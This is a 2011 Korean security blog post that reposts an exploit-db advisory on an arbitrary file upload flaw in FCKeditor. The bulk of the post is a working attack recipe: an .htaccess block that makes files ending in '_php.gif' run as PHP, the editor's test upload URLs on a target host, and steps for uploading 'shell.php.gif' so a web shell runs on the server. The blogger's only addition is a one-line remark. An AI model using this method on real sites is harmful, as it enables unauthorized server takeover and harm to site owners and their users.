FCKeditor all versian Arbitrary File Upload Vulnerability

위험한_친구들/코디_Editor 2011. 8. 10. 11:27
In The Name Of GOD 
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : WwW.PenTesters.IR
---------------------------------------------------------
1.create a htaccess file:
code: 
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
  
2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif

6.Now shell is available from server.

 

+++++++++++++++

[출처] http://www.exploit-db.com/exploits/17644

위 내용의 포인트는 htaccess file이 1번처럼 셋팅되어야 한다는거죠.-0-;

 

 

 

저작자표시 비영리 변경금지

'위험한_친구들 > 코디_Editor' 카테고리의 다른 글

iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability  (0) 2011.09.18
Timthumb Security Vulnerability – List of Themes  (0) 2011.08.16
Posted by bitfox
l
블로그 이미지
작은여우와 암행어사 IT Security Consulting History bitfox

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

카테고리

분류 전체보기 (190)
Hello_World! (24)
위험한_친구들 (50)
수술_도구 (20)
생각하는_보안 (20)
삽질이라쓰고_경험이라_읽는다. (10)
글로벌_Gossip (28)
나의 관심 (10)
도전_리버서 (5)
도전_외래어 (5)
a Shot a Day (18)

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

링크

티스토리툴바